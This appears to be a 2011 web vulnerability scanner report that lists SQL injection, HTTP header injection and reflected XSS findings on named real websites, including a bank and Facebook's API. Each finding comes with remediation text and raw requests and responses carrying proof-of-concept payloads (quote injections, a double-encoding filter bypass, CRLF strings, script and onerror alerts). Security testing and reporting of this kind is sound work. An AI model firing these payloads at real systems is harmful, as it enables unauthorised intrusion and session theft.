SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Learning Solutio ...[SNIP]... </b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
Request 2
GET /index.php HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
The art_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the art_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /news_detail.asp?we_cat=4&art_id=107529'&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1 Host: www.thestandard.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 03 Feb 2011 01:57:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 339 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSCSSRSQ=CABDPJKADHMKIKHPIDDLPNCO; path=/ Cache-control: private
<html>
<HTML> <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font> <p> <font face="Arial" size=2>ODBC driver does no ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527
GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:10:48 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/44609 823a43cd739?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 01:52:12 GMT Connection: close Location: /fis/error/error.asp?404;http://www.fis.com/49dfd b7061f6f456/worldnews/worldnews.asp
The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 01:52:17 GMT Connection: close Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c d95cbc5e854/worldnews.asp
3. Cross-site scripting (reflected)previousnext There are 182 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Date: Thu, 03 Feb 2011 01:32:17 GMT Content-type: application/x-javascript P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/ Server: lighttpd/1.4.22 Content-Length: 4484
The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Date: Thu, 03 Feb 2011 01:32:12 GMT Content-type: application/x-javascript P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/ Server: lighttpd/1.4.22 Content-Length: 4484
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Type: text/javascript;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache X-Cnection: close Date: Thu, 03 Feb 2011 01:33:00 GMT Content-Length: 427
The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=120 Content-Type: text/javascript;charset=utf-8 Expires: Wed, 02 Feb 2011 17:35:11 -0800 Pragma: X-Cnection: close Date: Thu, 03 Feb 2011 01:33:11 GMT Content-Length: 443
fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/plain Date: Wed, 02 Feb 2011 23:58:36 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 71 Connection: keep-alive
The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:43 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 102 Connection: keep-alive
The value of the out request parameter is copied into the HTML document as plain text between tags. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:41 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 72 Connection: keep-alive
The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:38 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 103 Connection: keep-alive
The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 500 Internal Server Error Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 02 Feb 2011 22:26:57 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: keep-alive Content-Length: 97
error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
